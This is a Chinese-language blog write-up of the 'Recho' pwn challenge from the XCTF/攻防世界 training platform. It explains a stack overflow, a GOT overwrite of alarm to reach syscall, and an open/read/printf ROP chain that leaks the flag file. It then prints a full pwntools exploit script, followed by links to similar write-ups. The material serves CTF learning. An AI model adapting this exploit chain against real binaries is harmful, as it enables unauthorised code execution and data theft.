【攻防世界】Recho

最新推荐文章于 2023-02-07 11:37:59 发布
最新推荐文章于 2023-02-07 11:37:59 发布
阅读量731 收藏 2
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115283647
版权

程序逆向 漏洞利用 pwntools syscall got表
关键词由CSDN通过智能技术生成
1.程序逆向

简单,略

2.漏洞利用

这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。
退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。
    因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。
题目中有了 read,write 可以使用,那还差 open。通过看 libc 源码知道,read,write,open 等函数都是通过 syscall 来进行调用的,只是 eax 寄存器的值不同:
在这里插入图片描述
在这里插入图片描述
open 的 eax 值为 2,所以如果能获得 syscall 的地址或者调用他的某处地址,便能够实现 open。我们想要达到的代码如下:

int fd = open("flag", READONLY);
read(fd, buf, 0x100)
printf("%s", buf)

本题中 alarm 函数在 init 中调用装载完实际地址后便再也没用,所以可以修改其 got 表的值指向 syscall:
在这里插入图片描述
可以看到在 alarm + 5 的地方就是 syscall,所以修改其 got 表值 + 5 即可,但是这步如何实现呢?在如下处有一个很有用的 gadget:
在这里插入图片描述
在这个地方右键点击 undifine 然后按一下 c 就变成如下指令:
在这里插入图片描述
这个 gadget 非常有用,如果 rdi 中存放的是 alarm 的 got 表地址,[rdi] 存放其真实函数地址,那么加上 al 的值就可以实现 got 表指向 syscall,(其中al 是 rax/eax 寄存器的低 32 / 16 位),那么此时传入 rax 的值为 2 就可以调用 open 了。
还有一个隐藏的 gadget 是一系列 pop 指令中,存在一个 pop rdi, ret :
在这里插入图片描述
然后我们还需要一个可读写的位置:
在这里插入图片描述
bss 段可读可写。
那我们的整个利用流程就是:

  • 先修改 alarm 函数的 got 表指向 syscall
  • 通过 syscall 调用 open
  • read 到 bss 段
  • printf 打印 flag
3.完整 exp
#encoding=utf-8
from pwn import *

p = process("./pwn")
elf = ELF("./pwn")
# libc = ELF("./libc_64.so.6")
# libc = elf.libc

context(log_level = 'debug')

add_rdi = p64(0x40070d)
bss_addr = p64(0x601080)
flag_addr = p64(0x601058)
pop_rax_ret = p64(0x4006fc)
pop_rdi_ret = p64(0x4008A3)
pop_rsi_r15_ret = p64(0x4008a1)
pop_rdx_ret = p64(0x4006fe)

alarm_got = p64(elf.got['alarm'])
syscall = p64(elf.plt['alarm'])
printf = p64(elf.plt['printf'])
read = p64(elf.plt['read'])

p.recvuntil("Welcome to Recho server!\n")
p.sendline(str(0x200))

# alarm -> syscall
pl = 'a'*0x38
pl += pop_rdi_ret + alarm_got
pl += pop_rax_ret + p64(5)
pl += add_rdi

# fd = open(flag, READONLY);
pl += pop_rsi_r15_ret + p64(0) + p64(0)
pl += pop_rdi_ret + flag_addr
pl += pop_rax_ret + p64(2) + syscall

# read(fd, bss_addr, 0x100)
pl += pop_rdi_ret + p64(3)
pl += pop_rsi_r15_ret + bss_addr + p64(0)
pl += pop_rdx_ret + p64(0x100) + read

# printf(bss_addr)
pl += pop_rdi_ret + bss_addr + printf

pl = pl.ljust(0x200, "\x00")
p.sendline(pl)

p.shutdown("write")

p.interactive()
、皮皮鸭
关注
专栏目录
【PWN系列】攻防世界 RECHO 题解
Vicl1fe的博客
11-03 464
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.freesion.com/article/5370510581/ 参考网址写的很详细。转载一下。
Recho(xctf)
weixin_43868725的博客
08-10 914
0x0 程序保护和流程 保护: 流程: main() 存在一个很明显的问题,就第二次可以输入的字符串大小是根据第一次输入的数字大小确定的,所以存在一个明显的栈溢出。 0x1 利用过程 1.通过栈溢出控制程序的流程只会发生在函数结束时,但是在这个程序中只要第一次的read函数一直有效程序就不会退出,所以在对栈完成布局之后就需要关闭输入。 2.一旦关闭输入,就不能继续输入了,所以必须一次就把gadget全部布置到栈上。 3.通过提示可以在.data中找到flag字符串。 4.于是猜想需要将名字为flag的
攻防世界--Recho
最新发布
qq_73149934的博客
02-07 235
攻防世界--Recho
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 1002
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 443
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
攻防世界 Pwn Recho
MrTreebook的博客
12-18 657
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1284
深感本题扩充了本人的知识面,遂作文记录下来
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
Recho扩展「Recho Extension」-crx插件
03-09
Recho扩展 Recho是一款Chrome扩展程序,可以实时在幻灯片上传输反应。 与指定的哈希标签喃喃自语的杂音,像幻灯片上的幻灯片一样实时流动。 您也可以通过插入此扩展名,通过智能手机远程控制滑动操作。 我认为我们...
Recho Extension-crx插件
04-02
recho extension recho是镀Chrome扩展,导致幻灯片上的实时React。 在指定的HASHTAG中得分的推文实时刷新,幻灯片上的幻灯片。 您还可以通过拨打此扩展来远程使用智能手机进行幻灯片操作。 我们认为,通过向LT...
shutdown:shutdown可用于正常退出正在运行的程序(的一部分)
02-13
关掉 shutdown可用于正常退出正在运行的程序(的一部分) 例子 以下示例显示了如何创建新的关闭通道,创建一些分支,订阅一些侦听器以及关闭其中一个分支: use shutdown :: Shutdown; fn main () { let root = Shutdown :: new (). unwrap (); // Create two new branches. let branch1 = root. branch (); let branch2 = root. branch (); // Create two new subscribers to the first branch. let subscriber1 = branch1. subscribe (); let subscriber2 = branch1. su
攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1744
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2383
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
Rcheo--攻防世界pwn
Return的博客
03-06 270
1.先查一下保护机制
攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 411
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
pwn 继续Recho
doudoudedi
09-28 658
好久没有更新博客了师傅们的评论都看了emem萌新会加油的~~ 这是一道xctf上的pwn题Rcho 主函数的逻辑很简单就是`// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { char ...
[XCTF-pwn] 18_3rd-rctf-2017_recho
weixin_52640415的博客
03-04 212
这个不看别人的还真没着。 题目本身有个逻辑问题:输入不能小于16,这样就可以写溢出了。但是由于有prctl不能直接用system,又没有open所以rop似乎没法写。另外一个是要让read读到报错退出循环。 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]; // [rsp+10h] [rbp-30h
(攻防世界)(2016 L-CTF)pwn100
PLpa的博客
07-12 2504
这题也是一个DynELF()的栈溢出题,不过这里是运用了puts函数而不是write函数,所以我们构造的leak函数就要不同些。 拿到题目,我们首先查看一下保护: 可以看到,程序只开启了NX保护。 我们进入IDA看一下程序逻辑,找一找漏洞: 我们找到了puts和read函数,看到了明显的栈溢出漏洞,一般思路就是DynELF函数的利用了: 我们找到我们需要的一些地址,然后开始构造exp: #!...
Recho.doc pwn题:栈溢出与shutdown漏洞利用
在"攻防世界pwn题:Recho.doc"这份文档中,讨论了一个针对64位二进制文件的逆向工程和漏洞利用挑战。该文件没有启用canary和PIE保护机制,提供了丰富的学习材料。以下是关键知识点的详细解析: 1. **文件与环境分析...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值